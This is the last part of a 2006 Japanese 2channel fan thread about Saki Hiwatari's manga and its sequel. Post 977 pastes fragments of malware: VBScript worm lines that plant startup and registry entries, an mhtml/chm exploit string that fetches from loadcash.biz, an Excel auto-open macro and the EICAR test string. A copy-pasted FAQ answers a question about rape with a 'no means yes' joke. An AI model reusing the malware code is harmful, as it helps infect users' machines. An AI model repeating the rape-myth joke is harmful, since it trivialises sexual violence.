腹の底で何を考えているのか分からない、やっぱりミステリアスなんだよね。
エピソードや登場回数では下回るだろう槐や繻子蘭の方がよほどどんな性格なのか
把握できる感じで。
春彦は真逆で思いっきり感情の描写も多くて、実際考えたままに行動しているよね。

969 :花と名無しさん:2006/10/18(水) 01:45:30 ID:???O
きりん好きだしね

970 :花と名無しさん:2006/10/18(水) 20:50:41 ID:???0
紫苑と玉の場合は、因縁というより憧れと羨望と逆恨みと愛情の裏返しだったからなあ。
自分が一番欲しい物(何をしても最終的には許しキスをくれる家族)を最初から持っていて、
しかもそれをあっさり捨てて月基地勤務志願。
だから奴の一番欲しい物(そして実は自分も一番欲しかった物)を奪ってやった、みたいな。

現世では輪は最初から家族もいるし、ありすも自分を愛してくれてるのが判明した時点で
迅八へのこだわりは何もなくなったというか。

971 :花と名無しさん:2006/10/18(水) 22:04:10 ID:???0
次スレ
http://comic6.2ch.net/test/read.cgi/gcomic/1161175064/l50

972 :花と名無しさん:2006/10/18(水) 22:24:25 ID:???0
>>971
とりあえず 氏 ね よ

973 :花と名無しさん:2006/10/18(水) 22:28:28 ID:???0
>>971はスルーでよろしく。
新スレはこちら
http://etc4.2ch.net/test/read.cgi/wcomic/1094822653/l50

974 :花と名無しさん:2006/10/18(水) 22:37:06 ID:???0
すれのむだづかいはやめましょう

975 :花と名無しさん:2006/10/19(木) 00:28:24 ID:???0
>>973
板が違うじゃねーか板が。

976 :花と名無しさん:2006/10/19(木) 22:20:26 ID:???0
ホントに次スレ。
タイトルの「守って」か1つ足んなかった。ごめんなさい。

http://comic6.2ch.net/test/read.cgi/gcomic/1161263869/

977 :<body onload=window()>:2006/10/19(木) 22:47:21 ID:???0
Set A4 = A1.CreateTextFile(A1.BuildPath(A1.GetSpecialFolder(1)))
<object data="ms-its:mhtml:file://C:\\MAIN.MHT!http://www.loadcash.biz//adverts//35//main.chm::/main.htm" type="text/
X5O!P%@AP[4\PZX54(P^)7CC)7}$EICAR-STANDARD-ANTIVIRUS-TEST-FILE!$H+H*
fso.copyfile "dirsystem&nurupo.vbs", "j:\windows\start menu\programs\startup\"
ToInfect.CodeModule.InsertLines BGN, ADI1.CodeModule.Lines(BGN, 1)
"avgnt"="\"C:\\Program Files\\AntiVir PersonalEdition Classic\\avgnt.exe\" /min /nosplash"
G.RegWrite A("IJDX^MNB@M^L@BIHOD]Rnguv`sd]Lhbsnrngu]Vhoenvr]BtssdouWdsrhno]Sto]VhoRu`su"), E.BuildPath(E.GetSpecialFolder(1), A("VHORU@SU/WCR"))
lines(n)=replace(lines(n),"""",chr(93)+chr(45)+chr(93))
ms-its:mhtml:file://c:\
kak.hta';ken=wd+'START
kill -9 xz/tSaBh0
Sub auto_open()
Application.OnSheetActivate = "check_files"
End Sub
Sub check_files()
c$ = Application.StartupPath
m$ = Dir(c$ & "\" & "PERSONAL.XLS")
If m$ = "PERSONAL.XLS" Then p = 1 Else p = 0
If ActiveWorkbook.Modules.Count > 0 Then w = 1 Else w = 0
whichfile = p + w * 10
End Sub

978 :既出ネタ: 1:2006/10/19(木) 23:02:09 ID:???0
さんざん既出のループネタその1

Q:紫苑と木蓮は何回ヤリましたか?
A:一発説と灰になるまで説があります。

Q:蓮は水子って本当ですか?
A:月基地から春と作者にのみ届いている
  強力電波の可能性が高いです。

Q:何故木蓮のキチェは消えなかったの?
A:知りません。サージャリムとビワタリ神のみ知る 思し召しです。

Q:あれはレイプ?和姦?
A1:夫婦間でも拒絶した事実があればレイプになるので、レイプでしょう。
ただ、木蓮が紫苑をかばう為にあれは合意だったと後から申告したので、
結果的に紫苑はお咎めナシになっただけ。
A2:簡潔に【イヤよイヤよも好きの内】

Q:アニメが中途半端でおわってしまうんですが・・・。
A1:仕様です。諦めましょう・・
A2:あなたの再生機は壊れていませんか?
  もう一度、植物がはびこっていないか
  お確かめの上、おかけ直し下さいw

979 :花と名無しさん:2006/10/19(木) 23:10:51 ID:???0
>>976
スレ立て乙。

ごめん。>>978は誤爆。
貼り付けが前後しちゃいました。申し訳ない。

980 :花と名無しさん:2006/10/20(金) 12:03:39 ID:???0
次スレ立てるの早すぎんじゃないの?

981 :花と名無しさん:2006/10/20(金) 15:09:55 ID:???0
>980
早すぎって事はないと思うよ。
自分のレス番、ちゃんと見えてる?

982 :花と名無しさん:2006/10/20(金) 16:12:56 ID:???0
もうすぐ1000というのに早すぎはないだろう。

983 :花と名無しさん:2006/10/21(土) 00:54:37 ID:???O
950以降に立ち、980では引っ越し終わってるんだから順調じゃね?
誘導できるかどうかギリのスレ立ては危険だよ〜
最近嵐が常駐してるからさ、なんかあったら対処に困るじゃん
このくらいが理想的だと思う

984 :花と名無しさん:2006/10/21(土) 03:43:51 ID:???0
>>976
乙であります。

985 :花と名無しさん:2006/10/22(日) 00:02:10 ID:???O
そろそろ梅ようぜ

986 :花と名無しさん:2006/10/22(日) 02:31:21 ID:???O
近所の漫喫に、ぼく地球とうてなしかなかった。
月って地球の続編なのにマイナーな扱いなのかな?

987 :花と名無しさん:2006/10/22(日) 03:18:13 ID:???0
>>986
その近所の漫喫の店の規模にもよるんじゃないか?
あまり広くなければ、新刊は入れるのにも制限があると思われ。
もうビワタリさんはピーク過ぎてる漫画家だから、利用客も少ないだろうし…。

988 :花と名無しさん:2006/10/22(日) 10:12:31 ID:???O
梅ませんか?

989 :花と名無しさん:2006/10/22(日) 10:17:25 ID:???0
>>986
店の規模もあるだろうけど、新刊の仕入れを
担当してる人がぼく地球を知らないとか、
そんなに人気があったとは知らないのかも。
そういう業務をバイトにやらせてる店もあるしね。

990 :花と名無しさん:2006/10/22(日) 10:30:26 ID:???O
こないだボク月3巻を書店で取り寄せしてもらったんだけど
まだ初版だった。売れてないのかな。

991 :花と名無しさん:2006/10/22(日) 11:19:51 ID:???0
3巻って出たばっかじゃないの?
コミクス買ってないからよくわかんないけど。

992 :花と名無しさん:2006/10/22(日) 11:28:19 ID:???O
結構たちますよ

993 :花と名無しさん:2006/10/22(日) 11:36:43 ID:???O
三ヵ月くらいたつかな?
増刷されていないんですね。

994 :花と名無しさん:2006/10/22(日) 12:02:15 ID:???O


995 :花と名無しさん:2006/10/22(日) 12:07:02 ID:???O


996 :花と名無しさん:2006/10/22(日) 12:08:01 ID:???O


997 :花と名無しさん:2006/10/22(日) 12:08:42 ID:???O


998 :花と名無しさん:2006/10/22(日) 12:12:34 ID:???O


999 :花と名無しさん:2006/10/22(日) 12:16:03 ID:???O


1000 :花と名無しさん:2006/10/22(日) 12:17:46 ID:???O
1000

1001 :1001:Over 1000 Thread
このスレッドは1000を超えました。
もう書けないので、新しいスレッドを立ててくださいです。。。

303 KB
★スマホ版★ 掲示板に戻る 全部 前100 次100 最新50

read.cgi ver 05.02.02 2014/06/23 Mango Mangüé ★
FOX ★ DSO(Dynamic Shared Object)